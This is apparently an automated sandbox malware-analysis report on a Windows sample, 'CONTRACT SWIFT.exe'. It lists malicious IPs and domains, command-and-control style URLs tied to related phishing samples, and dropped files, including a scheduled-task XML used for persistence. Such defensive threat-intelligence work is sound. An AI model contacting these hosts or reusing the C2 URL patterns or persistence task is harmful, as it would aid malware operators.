http://www.rnrsans.com/s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000006.00000000.330881685.000000000095C000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.rnrsans.com/display.cfm	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/leveleditor/CrystAlien-Conflict-Flash-WrapperJhttps://crystalien-redux.com/camm.p	CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	false		high
http://www.rnrsans.com/__media__/design/underconstructionnotice.php?d=rnrsans.com	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/leveleditor/CAMM-Crystal-Alien-Map-Maker/issuesVhttps://github.com/Brian151/CAC-U	CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.rnrsans.com/sk-logabpstatus.php?a=a1Y3UkFVeVRiTlBodXFpOVoxR0NFbExNZWF3aFBMeEs1RGNjTlV0dSs	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://marsmissionwiki.wikifoundry.com/page/CAMM	CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	false		high
http://www.rnrsans.com/__media__/js/trademark.php?d=rnrsans.com&type=ns	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/js/min.js?v2.2	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rnrsans.com/px.js?ch=2	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rnrsans.com/px.js?ch=1	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rnrsans.com/Free_Credit_Report.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8Q	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/leveleditor/CAMM-Crystal-Alien-Map-MakerNhttp://marsmissionwiki.wikifoundry.com/:	CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
208.110.82.29	www.qizhukeji.com	United States	32097	WIIUS	true
217.160.0.220	www.votelaura.info	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
192.0.78.25	annafelicia.com	United States	2635	AUTOMATTICUS	true
172.67.155.68	www.500truyen.com	United States	13335	CLOUDFLARENETUS	true
154.208.179.46	www.ecms2019.net	Seychelles	40065	CNSERVERSUS	true
91.184.0.43	www.ursulaaubri.com	Netherlands	197902	HOSTNETNL	true
52.14.32.15	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	United States	16509	AMAZON-02US	false
34.102.136.180	dominatedirectsales.com	United States	15169	GOOGLEUS	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
208.91.197.27	www.rnrsans.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	427265
Start date:	31.05.2021
Start time:	21:45:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CONTRACT SWIFT.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/4@12/10
EGA Information:	Failed
HDC Information:	Successful, ratio: 31.8% (good quality ratio 28.9%) Quality average: 73% Quality standard deviation: 31.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 124 Number of non-executed functions: 185
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 51.103.5.186, 204.79.197.200, 13.107.21.200, 92.122.145.220, 104.43.139.144, 104.42.151.234, 20.82.210.154, 20.54.7.98, 20.54.104.15, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 20.50.102.62, 184.30.20.56 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:46:03	API Interceptor	1x Sleep call for process: CONTRACT SWIFT.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
208.110.82.29	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	www.qizhukeji.com/s5cm/?p0G=ndfPKtxxGRrhJ&jrTDmX=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYXvsEQwdDuv
	MT103 - Remittance.exe	Get hash	malicious	Browse	www.qizhukeji.com/s5cm/?U4ht=Ovpduruh8Z5tNNP&tZkPXV-=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYXvsEQwdDuv
	PDF Purchase Order #RFQ7787HG00.exe	Get hash	malicious	Browse	www.qizhukeji.com/s5cm/?jJE=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYbWgl8wKFy+6Vljpw==&wXO=O2Mtwpn
	correct invoice.exe	Get hash	malicious	Browse	www.qizhukeji.com/s5cm/?Zh3XHBo=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYbv/UczETu56Vlk6A==&Xv0Hzp=j0Dx
217.160.0.220	P.O #RFQ7787HG00.exe	Get hash	malicious	Browse	www.votelaura.info/s5cm/?rDHxb=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&Wr=JhnHMfqPY
	PDF Purchase Order #RFQ7787HG00.exe	Get hash	malicious	Browse	www.votelaura.info/s5cm/?jJE=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3UAW6HTPlJ12dgGJw==&wXO=O2Mtwpn
	PURCHASE ORDER REQUIREMENT.exe	Get hash	malicious	Browse	www.votelaura.info/s5cm/?_JE=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W04DKKLrCE0j&-Zhl=8pd8ZrPp1lL8wR
192.0.78.25	item.exe	Get hash	malicious	Browse	www.viviangee.net/m3rc/?s864=Rplm9Zqm1bsTCiQ8zCYp9ODm03Tc7pnEYFm3lAJXwDtX36/iYM/09//KWQc1y8ZCyk+B&Ntipth=llyx
	#U20ac9,770 pdf.exe	Get hash	malicious	Browse	www.emmajanetracy.com/pux4/?Lv0h=txxtjgcJPfhk5Qs0WZJ2NFf/Mc7RWektJEcL86LWYh07HqvjGqavxuCSUFOttHhbbZYheKQE8g==&VlKt=wBNl4pd0L
	HEN.exe	Get hash	malicious	Browse	www.winterpublishinghouse.com/aipc/?TlPt=Z9mnZyfY5CpLAzXPPb3enFLkttc7m+LSSJAo0MNQKNo/LlAoS/712uitoCNNLYBJtLDKH1Kt6g==&6l=mnSl
	Taisier Med Surgical Sutures.exe	Get hash	malicious	Browse	www.winterpublishinghouse.com/aipc/?OXo8y=Z9mnZyfY5CpLAzXPPb3enFLkttc7m+LSSJAo0MNQKNo/LlAoS/712uitoBhdXpdyq+qb&mh2X=H0Dlkf3hSxn4kr
	REQUEST_QUOTATION.exe	Get hash	malicious	Browse	www.alizamcandrew.com/owws/?wh=3mJKy8YDanvUgpvwaCWjpSVsO3Q/3xZjCnaZckGkGs4/h8JUNpt9X4zLiP3S1vKiMct6&Sh=CpCLnL8
	Pdf MT103 - Remittance.pdf.exe	Get hash	malicious	Browse	www.annafelicia.com/s5cm/?kR-4q=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXvIPDZ++8b89cNebQ==&P0D=Atxturd
	POSWM240521.exe	Get hash	malicious	Browse	www.unapersonaestabien.com/m3rc/?QZ3=DnJpqlx8pzo8Q0&CRi=o7izuhN0eiDBtRVTd1lDz6WKoPkNEuauPIN5CezYSPQXzsgO8JvVj8I3N35LwhoKW+Ey
	New order 201534.pdf.exe	Get hash	malicious	Browse	www.exafeprods.com/sbqi/?8pdPxFYX=wlXNghr8E5DBrABF7PUJ5OZBbAz3HWA6A4d9F/DKLZM4PCK20Ia3HOsX74YqnMTWqQvc&_FNlAt=tVEl9tDHXfB4
	PO01837.exe	Get hash	malicious	Browse	www.erikagrandstaff.com/gqav/?tFQh=YP4DHzJP&w0G=7NINm+fZFAC3STmoanEKnjBIE/SR+O04cUI08RseUW/v4ybJES7UJjxqVGhngAmid5y9
	7LQAaB3oH4.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?JvHxx=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZbge4LhevE&I48=AFQl7ZhpHxzl
	netwire.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?uTd4K=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1hjfUwipOV1CQA6A==&R2Mxy=Mj_TAvcPhrsHPBTP
	8a5afe99_by_Libranalysis.exe	Get hash	malicious	Browse	www.criminalwomen.com/pb93/?pPX=CM+en69MnY27IAm0SUP+pcqTd8mta1Oowk2nuaH52HnHGg6NC6Se32tYkzlXCiZIARoFYXI+VA==&1bj=jlK0MfGPh
	RFQ - 001.xlsx	Get hash	malicious	Browse	www.micheldrake.com/p2io/?bdm=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&CDH=oPR8Arf
	bd729c36_by_Libranalysis.exe	Get hash	malicious	Browse	www.lostintraveland.com/nt8e/?vZR=VbtcqB+EWbxdZOX/9YxeVA6owrwkM55mfLmzDpPytykHKv5w+HQ2tOlnH/t2oN2bfJ9W1t42Dw==&W6=GtSP
	New Order_PO 1164_HD-F 4020 6K.exe	Get hash	malicious	Browse	www.mykiwidesign.com/un8c/?D8ODAr=shtUrfI/xlBO8C2aliNZenIpYotasWnDtIq4lctURnres2cu8VpZnDv2KHIrTwDBcoSX&mJ=V6AHzvxh
	92bd9987_by_Libranalysis.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?Ulm=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1hjfUwipOV1CQA6A==&SVg84P=yjR8DXLxiJb
	PROFORMA001THK.exe	Get hash	malicious	Browse	www.ponchakazumi.com/epns/?TbGDgj=pYcGYPTRyHsmYCYGZbLxnClOk6Zlf0jyPMn1vr8LRA0f2IPq4XozoulSjPMNjuVvL5JJ&NVoh0R=oZ9pdNPXbn-l5T6p
	4GGwmv0AJm.exe	Get hash	malicious	Browse	shirleymancino.com/.pim1/?action=fbgen&v=110&crc=669
	0d69e4f6_by_Libranalysis.xls	Get hash	malicious	Browse	www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn
	wMqdemYyHm.exe	Get hash	malicious	Browse	www.mariacolom.net/f0sg/?7n0lqHm=AymEOqKXV1chl8iQYgJ3uquKzbaTRejMwBVZPwqkc2a5oMJioVLywtrs+1kTDlzhFYWt&CP=chrxU

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.qizhukeji.com	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	208.110.82.29
	MT103 - Remittance.exe	Get hash	malicious	Browse	208.110.82.29
	PDF Purchase Order #RFQ7787HG00.exe	Get hash	malicious	Browse	208.110.82.29
	correct invoice.exe	Get hash	malicious	Browse	208.110.82.29
www.ursulaaubri.com	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	91.184.0.43
	Pdf Scen Invoice 17INV06003.exe	Get hash	malicious	Browse	91.184.0.43
	Pdf Scen Invoice 17INV06003.exe	Get hash	malicious	Browse	91.184.0.43
	Pdf MT103 - Remittance.pdf.exe	Get hash	malicious	Browse	91.184.0.43
	MT103 - Remittance.exe	Get hash	malicious	Browse	91.184.0.43
	P.O #RFQ7787HG00.exe	Get hash	malicious	Browse	91.184.0.43
	PDF Purchase Order #RFQ7787HG00.exe	Get hash	malicious	Browse	91.184.0.43
	correct invoice.exe	Get hash	malicious	Browse	91.184.0.43
	PURCHASE ORDER REQUIREMENT.exe	Get hash	malicious	Browse	91.184.0.43
	PAYMENT INSTRUCTIONS COPY.exe	Get hash	malicious	Browse	91.184.0.43
www.zaseto.com	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	217.198.116.188
	Pdf Scen Invoice 17INV06003.exe	Get hash	malicious	Browse	217.198.116.188
	PDF Purchase Order #RFQ7787HG00.exe	Get hash	malicious	Browse	217.198.116.188
www.ecms2019.net	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	154.208.179.46
www.ecms2019.net	correct invoice.exe	Get hash	malicious	Browse	154.208.179.46
www.500truyen.com	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	104.21.72.213
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	RE; KOC RFQ for Flangers - RFQ 22965431.exe	Get hash	malicious	Browse	52.14.32.15
	PO 0003789311.exe	Get hash	malicious	Browse	13.59.53.244
	tgb4.exe	Get hash	malicious	Browse	13.59.53.244
	transferencia bancaria.exe	Get hash	malicious	Browse	52.15.160.167
	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	3.143.65.214
	item.exe	Get hash	malicious	Browse	13.59.53.244
	mal1.exe	Get hash	malicious	Browse	13.59.53.244
	Payment Confirmation.exe	Get hash	malicious	Browse	52.15.160.167
	PO_0065-2021.exe	Get hash	malicious	Browse	13.59.53.244
	PURCHASE ORDER LIST.exe	Get hash	malicious	Browse	52.15.160.167
	MkV1zeHKw7.exe	Get hash	malicious	Browse	13.59.53.244
	Descripciones de oferta de productos MACIILIAS SRL doc.exe	Get hash	malicious	Browse	3.143.65.214
	n2fpCzXURP.exe	Get hash	malicious	Browse	13.59.53.244
	Purchase Inquiry&Product Specification.exe	Get hash	malicious	Browse	13.59.53.244
	New order 201534.pdf.exe	Get hash	malicious	Browse	13.59.53.244
	New order 301534.pdf.exe	Get hash	malicious	Browse	3.143.65.214
	d8HbibhqWZ.exe	Get hash	malicious	Browse	52.15.160.167
	pictures.exe	Get hash	malicious	Browse	13.59.53.244
	f268bad6_by_Libranalysis.exe	Get hash	malicious	Browse	13.59.53.244
	KWX1rM9GB0.exe	Get hash	malicious	Browse	3.16.197.4
www.votelaura.info	P.O #RFQ7787HG00.exe	Get hash	malicious	Browse	217.160.0.220
	PDF Purchase Order #RFQ7787HG00.exe	Get hash	malicious	Browse	217.160.0.220
	PURCHASE ORDER REQUIREMENT.exe	Get hash	malicious	Browse	217.160.0.220

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONEANDONE-ASBrauerstrasse48DE	cat.exe	Get hash	malicious	Browse	212.227.86.14
	cy.exe	Get hash	malicious	Browse	74.208.236.70
	rove.exe	Get hash	malicious	Browse	74.208.236.146
	Failure Notice Details PDF.exe	Get hash	malicious	Browse	217.160.0.120
	1092991(JB#082).exe	Get hash	malicious	Browse	74.208.236.190
	S5.exe	Get hash	malicious	Browse	74.208.5.12
	Ack0527073465.exe	Get hash	malicious	Browse	74.208.236.164
	PP05492110.exe	Get hash	malicious	Browse	74.208.236.190
	Document_46161561.xls	Get hash	malicious	Browse	217.160.0.26
	R66H8ZKLjU.xls	Get hash	malicious	Browse	217.160.0.5
	SecuriteInfo.com.VB.Trojan.Valyria.4710.21156.xls	Get hash	malicious	Browse	217.160.0.5
	sample1.doc	Get hash	malicious	Browse	74.208.173.91
	Payment Slip.exe	Get hash	malicious	Browse	74.208.5.15
	parcel details.exe	Get hash	malicious	Browse	74.208.5.15
	REQUEST_QUOTATION.exe	Get hash	malicious	Browse	74.208.236.245
	Rate - 5SLN - 03x 40 HC.pdf.exe	Get hash	malicious	Browse	217.76.128.34
	Pdf Scen Invoice 17INV06003.exe	Get hash	malicious	Browse	74.208.236.5
	DHL parcel.exe	Get hash	malicious	Browse	74.208.5.15
	Pdf MT103 - Remittance.pdf.exe	Get hash	malicious	Browse	74.208.236.5
	cy.exe	Get hash	malicious	Browse	74.208.236.70
AUTOMATTICUS	cat.exe	Get hash	malicious	Browse	192.0.78.13
	Bank transfer copy.xlsx	Get hash	malicious	Browse	192.0.78.24
	RE KOC RFQ for Flanges - RFQ 2074898.exe	Get hash	malicious	Browse	192.0.78.24
	rove.exe	Get hash	malicious	Browse	192.0.78.24
	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	192.0.78.24
	item.exe	Get hash	malicious	Browse	192.0.78.25
	#U20ac9,770 pdf.exe	Get hash	malicious	Browse	192.0.78.25
	USU(1).exe	Get hash	malicious	Browse	192.0.78.24
	HEN.exe	Get hash	malicious	Browse	192.0.78.25
	Taisier Med Surgical Sutures.exe	Get hash	malicious	Browse	192.0.78.25
	Purchase Order.pdf.exe	Get hash	malicious	Browse	192.0.78.24
	DHL_119045_Receipt document,pdf.exe	Get hash	malicious	Browse	192.0.78.211
	REQUEST_QUOTATION.exe	Get hash	malicious	Browse	192.0.78.24
	ygv2xv4xHM.exe	Get hash	malicious	Browse	192.0.78.170
	Qgc2Nreer3.exe	Get hash	malicious	Browse	192.0.77.40
	Pdf MT103 - Remittance.pdf.exe	Get hash	malicious	Browse	192.0.78.24
	POSWM240521.exe	Get hash	malicious	Browse	192.0.78.25
	New order 201534.pdf.exe	Get hash	malicious	Browse	192.0.78.25
	PO01837.exe	Get hash	malicious	Browse	192.0.78.25
	Inv3063200.exe	Get hash	malicious	Browse	192.0.78.24
WIIUS	PO.pdf.exe	Get hash	malicious	Browse	173.208.204.37
	RFQ.exe	Get hash	malicious	Browse	173.208.204.37
	TN2021052801SCHONGQING GENKINS POWER LTD,pdf..exe	Get hash	malicious	Browse	173.208.204.37
	SHIPPING DOCUMENT_7048555233PDF.exe	Get hash	malicious	Browse	208.110.82.29
	Ack0527073465.exe	Get hash	malicious	Browse	204.12.248.163
	file.exe	Get hash	malicious	Browse	173.208.204.37
	Original dhl Shipping Document_PDF.exe	Get hash	malicious	Browse	173.208.204.37
	5.25.21.exe	Get hash	malicious	Browse	69.197.162.75
	PO26052021.exe	Get hash	malicious	Browse	173.208.204.37
	Purchase Order.exe	Get hash	malicious	Browse	173.208.204.37
	NEW ORDER...2020208.pdf.exe	Get hash	malicious	Browse	173.208.204.37
	MPL0022323920_pdf.gz.exe	Get hash	malicious	Browse	173.208.204.37
	Shipping Documents.pdf.exe	Get hash	malicious	Browse	173.208.204.37
	PO858696000060.exe	Get hash	malicious	Browse	173.208.204.37
	SWIFT COPY.PDF.exe	Get hash	malicious	Browse	173.208.204.37
	SHIPPING DOCUMENTS.PDF.exe	Get hash	malicious	Browse	173.208.204.37
	PbR4oOAUYrKr6xI.exe	Get hash	malicious	Browse	173.208.204.37
	NRTEC RFQ_21523UY-1.exe	Get hash	malicious	Browse	173.208.204.37
	Request for quotation [Ebest Trading Co., Ltd.].PDF.exe	Get hash	malicious	Browse	173.208.204.37
	fb6338b7_by_Libranalysis.exe	Get hash	malicious	Browse	173.208.204.37

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CONTRACT SWIFT.exe.log Download File
Process:	C:\Users\user\Desktop\CONTRACT SWIFT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmpF496.tmp Download File
Process:	C:\Users\user\Desktop\CONTRACT SWIFT.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1651
Entropy (8bit):	5.153224593216268
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3WbBtn:cbha7JlNQV/rydbz9I3YODOLNdq3AbT
MD5:	F540FF902266242184430B50F84F65A5
SHA1:	7104C5FA31191AA00CE11338A5B24EA2300338C6
SHA-256:	3B6E62365888C8D8085E7D77DB698A300C7FD1D59ED2222A14C83C8925733698
SHA-512:	F47A91E47C16FAB44B3EB719E551D72284D832216A1FCA35E60C2A1AAC85E6712E5A7BC9E5B9F5F7F539CC942FEA8F30A446E83C29CF173EB3874283EF0B05BE
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

C:\Users\user\AppData\Roaming\hiCrWx.exe Download File
Process:	C:\Users\user\Desktop\CONTRACT SWIFT.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1051136
Entropy (8bit):	7.415631803214036
Encrypted:	false
